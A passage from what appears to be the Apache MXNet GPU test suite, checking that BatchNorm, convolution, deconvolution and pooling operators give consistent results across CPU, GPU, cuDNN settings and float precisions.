{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float64}},
]
ctx_list_v2_1D = [
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float64}},
]
ctx_list_v2_3D = [
{'ctx': mx.cpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float64}}
]
# V1, 2D
sym = mx.sym.BatchNorm_v1(name='norm', fix_gamma=False)
check_consistency(sym, ctx_list_v1_2D)
sym = mx.sym.BatchNorm_v1(name='norm', fix_gamma=True)
check_consistency(sym, ctx_list_v1_2D)
# V2, 2D
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
# V2, 1D
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
#
# # V2, 3D
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_3D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_3D)
@with_seed()
@pytest.mark.serial
def test_batchnorm_versions():
def test_batchnorm_versions_helper(batchnorm_op_list, data, fix_gamma, use_global_stats):
ctx_list = []
sym_list = []
# BatchNormV1 cpu
if 'batchnorm_v1_cpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.cpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm_v1(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm'))
# BatchNormV1 gpu (organic)
if 'batchnorm_v1_gpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm_v1(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm'))
# BatchNorm cpu
if 'batchnorm_cpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.cpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm'))
# BatchNorm gpu (organic)
if 'batchnorm_gpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm', cudnn_off=True))
# BatchNorm gpu cudnn (if cudnn is enabled)
if 'batchnorm_cudnn' in batchnorm_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm', cudnn_off=False))
check_consistency(sym_list, ctx_list)
def test_1d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 20)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_cpu',
'batchnorm_gpu', 'batchnorm_cudnn'],
data=data,
fix_gamma=fix_gamma, use_global_stats=use_global_stats)
def test_2d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 10, 10)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_v1_cpu', 'batchnorm_v1_gpu',
'batchnorm_cpu',
'batchnorm_gpu', 'batchnorm_cudnn'],
data=data,
fix_gamma=fix_gamma, use_global_stats=use_global_stats)
def test_3d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 3, 5, 5)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_cpu',
'batchnorm_gpu'],
data=data,
fix_gamma=fix_gamma, use_global_stats=use_global_stats)
test_1d_batchnorm(True, False)
test_1d_batchnorm(False, False)
test_1d_batchnorm(False, True)
test_1d_batchnorm(True, True)
test_2d_batchnorm(True, False)
test_2d_batchnorm(False, False)
test_2d_batchnorm(False, True)
test_2d_batchnorm(True, True)
test_3d_batchnorm(True, False)
test_3d_batchnorm(False, False)
test_3d_batchnorm(False, True)
test_3d_batchnorm(True, True)
@with_seed(1234)
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
@pytest.mark.serial
def test_convolution_with_type():
sym1 = mx.sym.Convolution(num_filter=3, kernel=(3,3), name='conv')
data = mx.sym.Variable('conv_data')
w = mx.sym.Variable('conv_weight')
b = mx.sym.Variable('conv_bias')
w = mx.sym.transpose(w, axes=(0,2,3,1))
sym2 = mx.sym.transpose(data, axes=(0,2,3,1))
sym2 = mx.sym.Convolution(sym2, w, b, layout='NHWC', num_filter=3, kernel=(3,3))
sym2 = mx.sym.transpose(sym2, axes=(0,3,1,2), name='conv')
sym = [sym1, sym1, sym1, sym1, sym1, sym2, sym2]
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float32}},
# NHWC
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'conv_weight': (3, 2, 3, 3),
'type_dict': {'conv_data': np.float32, 'conv_weight': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'conv_weight': (3, 2, 3, 3),
'type_dict': {'conv_data': np.float16, 'conv_weight': np.float16}}
]
# wider tolerance needed for true-fp16 NCHW test above
tol = {np.dtype(np.float16): 0.5,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, tol=tol)
# test ability to turn off training on bias
check_consistency(sym, ctx_list, grad_req={'conv_data': 'write', 'conv_weight': 'write', 'conv_bias': 'null'}, tol=tol)
# Apply N symbols against each of M contexts, checking that all NxM combinations match.
def check_consistency_NxM(sym_list, ctx_list):
# e.g. if sym_list=[sym1, sym2] and ctx_list=[ctx1, ctx2, ctx3], then resulting lists are:
# sym_list=[sym1, sym1, sym1, sym2, sym2, sym2] and ctx_list=[ctx1, ctx2, ctx3, ctx1, ctx2, ctx3]
check_consistency(np.repeat(sym_list, len(ctx_list)), ctx_list * len(sym_list), scale=0.5)
@pytest.mark.skip(reason="test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/10141")
@with_seed()
@pytest.mark.serial
def test_convolution_options():
# 1D convolution
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), pad=(1,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), pad=(1,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), stride=(2,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), stride=(2,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), dilate=(2,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), dilate=(2,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(1,), pad=(0,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,), pad=(0,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 2D convolution
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), stride=(2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), stride=(2,2), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), dilate=(2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), dilate=(2,2), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(num_filter=3, kernel=(1,1), pad=(0,0), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,1), pad=(0,0), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 3D convolution
ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(num_filter=3, kernel=(1,1,1), pad=(0,0,0), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,1,1), pad=(0,0,0), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
@with_seed()
@pytest.mark.serial
def test_conv_deconv_guards():
# Test cases for convolution and deconvolution via strided fft. Ensure that the framework
# guards against problematic CUDNN_CONVOLUTION_BWD_DATA_ALGO_FFT_TILING in cuDNN [7.3.1,7.5)
# see https://docs.nvidia.com/deeplearning/sdk/cudnn-release-notes/rel_750.html#rel_750
tol = 1e-1
for (op, opname) in [(mx.sym.Convolution, 'conv'), (mx.sym.Deconvolution, 'deconv')]:
dataname = opname + '_data'
ctx = {'ctx': mx.gpu(0), dataname: (32, 32, 64, 64), 'type_dict': {dataname: np.float32}}
test_cases = [
{'num_filter':32, 'kernel':(6,6), 'pad':(0,0), 'stride':(2,2), 'name': opname},
{'num_filter':32, 'kernel':(6,6), 'pad':(1,1), 'stride':(2,2), 'name': opname},
{'num_filter':32, 'kernel':(6,7), 'pad':(0,1), 'stride':(2,2), 'name': opname},
{'num_filter':32, 'kernel':(7,6), 'pad':(1,0), 'stride':(2,2), 'name': opname},
{'num_filter':32, 'kernel':(7,7), 'pad':(0,0), 'stride':(2,2), 'name': opname},
{'num_filter':32, 'kernel':(7,7), 'pad':(1,1), 'stride':(2,2), 'name': opname}]
for test_case_args in test_cases:
try:
sym = op(**test_case_args)
sym_no_cudnn = op(cudnn_off=True, **test_case_args)
check_consistency([sym, sym_no_cudnn], [ctx, ctx], tol=tol)
except:
print('Test failure of mx.sym.{} with args: {}'.format(op.__name__, test_case_args))
raise
def _conv_with_num_streams(seed):
with random_seed(seed):
# Try to expose timing-dependent improper workspace sharing by parallel dgrad and wgrad
num_trials = 20
for _ in range(num_trials):
size = np.random.randint(32, 128)
# The cudnn conv operator runs dgrad and wgrad in separate streams if enabled, with possible
# kernel overlap. The non-cudnn conv op doesn't do this so is used as the 'golden copy'.
ctx = {'ctx': mx.gpu(0), 'conv_data': (2, 2, size, size),
'type_dict': {'conv_data': np.float32}}
# Adding 'flip' here isolates the model from the input node (which can't use inplace store)
flipped = mx.sym.flip(axis=0, name='conv')
sym = mx.sym.Convolution(data=flipped, num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
flipped_no_cudnn = mx.sym.flip(axis=0, name='conv')
sym_no_cudnn = mx.sym.Convolution(data=flipped_no_cudnn, num_filter=3, kernel=(3,3), pad=(1,1),
cudnn_off=True, name='conv')
try:
# tol can be pretty high- we're looking for a large diff due to garbaged workspace
check_consistency([sym, sym_no_cudnn], [ctx, ctx], tol=1e-2)
except:
print('Failing conv size = {}'.format(size))
raise
@pytest.mark.skip(reason="skipping for now due to severe flakiness")
@with_seed()
def test_convolution_multiple_streams():
for num_streams in [1, 2]:
for engine in ['NaiveEngine', 'ThreadedEngine', 'ThreadedEnginePerDevice']:
print("Starting engine %s with %d streams." % (engine, num_streams), file=sys.stderr)
run_in_spawned_process(_conv_with_num_streams,
{'MXNET_GPU_WORKER_NSTREAMS' : num_streams, 'MXNET_ENGINE_TYPE' : engine})
print("Finished engine %s with %d streams." % (engine, num_streams), file=sys.stderr)
# This test is designed to expose an issue with cudnn v7.1.4 algo find() when invoked with large c.
# Algos returned by find() can fail to run with grad_req='add' (wgrad kernel beta parameter == 1.0f).
@with_seed()
@pytest.mark.serial
def test_convolution_large_c():
problematic_c = 64 * 1024
# The convolution accumulates many values, so set large tolerances.
tol = {np.dtype(np.float32): 1,
np.dtype(np.float64): 1}
def test_1D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, width), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, width), 'type_dict': {'conv_data': np.float64}}]
sym = mx.sym.Convolution(layout='NCW', num_filter=8, kernel=(2,), name='conv')
check_consistency([sym, sym], ctx_list, tol=tol, grad_req=grad_req)
def test_2D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, 2, width), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, 2, width), 'type_dict': {'conv_data': np.float64}}]
sym = mx.sym.Convolution(layout='NCHW', num_filter=4, kernel=(2,2), name='conv')
check_consistency([sym, sym], ctx_list, tol=tol, grad_req=grad_req)
# Run with different data tensor shapes to run cudnnFind() multiple times.
# First, populate algo and op caches with models that always use cudnnFind() (req == 'write').
# Then run models that must avoid cached cudnnFind() results in some cases (req == 'add').
widths = [4, 16, 64]
for req in ['write', 'add']:
for width in widths:
test_1D_with_width(width, req)
test_2D_with_width(width, req)
# This test is designed to expose an issue with cudnn v7.1.4 algo find() when invoked with large c.
# Algos returned by find() can fail to run with grad_req='add' (wgrad kernel beta parameter == 1.0f).
@with_seed()
@pytest.mark.serial
def test_deconvolution_large_c():
problematic_c = 64 * 1024
# The deconvolution accumulates many values, so set large tolerances.
tol = {np.dtype(np.float32): 1,
np.dtype(np.float64): 1}
def test_1D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (1, 8, width), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (1, 8, width), 'type_dict': {'deconv_data': np.float64}}]
sym = mx.sym.Deconvolution(layout='NCW', num_filter=problematic_c, kernel=(2,), name='deconv')
check_consistency([sym, sym], ctx_list, tol=tol, grad_req=grad_req)
def test_2D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (1, 8, 2, width), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (1, 8, 2, width), 'type_dict': {'deconv_data': np.float64}}]
sym = mx.sym.Deconvolution(layout='NCHW', num_filter=problematic_c, kernel=(2,2), name='deconv')
check_consistency([sym, sym], ctx_list, tol=tol, grad_req=grad_req)
# Run with different data tensor shapes to run cudnnFind() multiple times.
# First, populate algo and op caches with models that always use cudnnFind() (req == 'write').
# Then run models that must avoid cached cudnnFind() results in some cases (req == 'add').
widths = [4, 16, 64]
for req in ['write', 'add']:
for width in widths:
test_1D_with_width(width, req)
test_2D_with_width(width, req)
@with_seed()
@pytest.mark.serial
def test_convolution_versions():
# 2D convolution NCHW
ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}]
conv_v1_cpu = mx.sym.Convolution_v1(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_v1_gpu = mx.sym.Convolution_v1(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
conv_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_cpu = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_gpu = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
syms = [conv_v1_cpu, conv_v1_gpu, conv_cudnn, conv_cpu, conv_gpu]
check_consistency(syms, ctx_list)
# 3D convolution NCDHW
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
conv_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
conv_cpu = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
conv_gpu = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
syms = [conv_cudnn, conv_cpu, conv_gpu]
check_consistency(syms, ctx_list)
# More max-pooling strides and pads to test cudnn pooling implementation code paths
@with_seed()
@pytest.mark.serial
def test_pooling_nhwc_with_convention():
def make_pooling_syms(**kwargs):
# Conventional NCHW layout pooling
sym = mx.sym.Pooling(**kwargs)
# NHWC pooling
data = mx.sym.Variable('pool_data')
sym_nhwc = mx.sym.transpose(data, axes=(0,2,3,1))
sym_nhwc = mx.sym.Pooling(sym_nhwc, layout='NHWC', **kwargs)
sym_nhwc = mx.sym.transpose(sym_nhwc, axes=(0,3,1,2), name='pool')
return [sym, sym_nhwc]
# While the float32 and float64 output is reliably consistent, float16 departs occasionally.
# We compare nhwc and nchw results only within a given precision.
for in_shape in [(3, 4, 8, 8), (2, 2, 20, 20)]:
for kernel in [(2,2), (3,3), (4,4)]:
for stride in [(1,1), (1,2), (2,1), (2,2)]:
for data_type in [np.float64, np.float32, np.float16]:
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': in_shape,
'type_dict': {'pool_data': data_type}}]
symlist = make_pooling_syms(kernel=kernel, pool_type='max', stride=stride,
pooling_convention='valid', name='pool')
check_consistency_NxM(symlist, ctx_list)
symlist = make_pooling_syms(kernel=kernel, pool_type='max', stride=stride,
pooling_convention='full', name='pool')
check_consistency_NxM(symlist, ctx_list)
symlist = make_pooling_syms(kernel=(300,300), pool_type='max',
global_pool=True, name='pool')
check_consistency_NxM(symlist, ctx_list)
@pytest.mark.serial
def test_pooling_with_type():
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float32}},
{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float16}},
{'ctx': mx.cpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
{'ctx': mx.cpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float32}}]
sym = mx.sym.Pooling(kernel=(3,3), pool_type='max', pooling_convention='valid', name='pool')
check_consistency(sym, ctx_list, rand_type=np.float16)
sym = mx.sym.Pooling(kernel=(3,3), pool_type='max', pooling_convention='full', name='pool')
check_consistency(sym, ctx_list, rand_type=np.float16)
sym = mx.sym.Pooling(kernel=(300,300), pool_type='max', global_pool=True, name='pool')
check_consistency(sym, ctx_list, rand_type=np.float16)
@with_seed()
@pytest.mark.serial
def test_deconvolution_with_type():
# Test basic deconvolution without exercising stride, pad or dilation.
# 1D deconvolution
sym = mx.sym.Deconvolution(num_filter=3, kernel=(3,), name='deconv')
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}}]
# wider tolerance needed for true-fp16 test above
tol = {np.dtype(np.float16): 0.3,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, tol=tol)
check_consistency(sym, ctx_list, tol=tol, grad_req="add")
# 2D deconvolution
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), name='deconv')
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}}]
# wider tolerance needed for true-fp16 test above
tol = {np.dtype(np.float16): 0.3,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, tol=tol)
check_consistency(sym, ctx_list, tol=tol, grad_req="add")
@with_seed()
@pytest.mark.serial
def test_deconvolution_options():
# 1D deconvolution
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), pad=(1,), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), pad=(1,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), stride=(2,), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), stride=(2,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), dilate=(2,), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), dilate=(2,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 2D deconvolution
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), pad=(1,1), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), pad=(1,1), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), stride=(2,2), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), stride=(2,2), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), dilate=(2,2), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), dilate=(2,2), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# # 3D deconvolution (not yet enabled)
# ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
# {'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
# {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
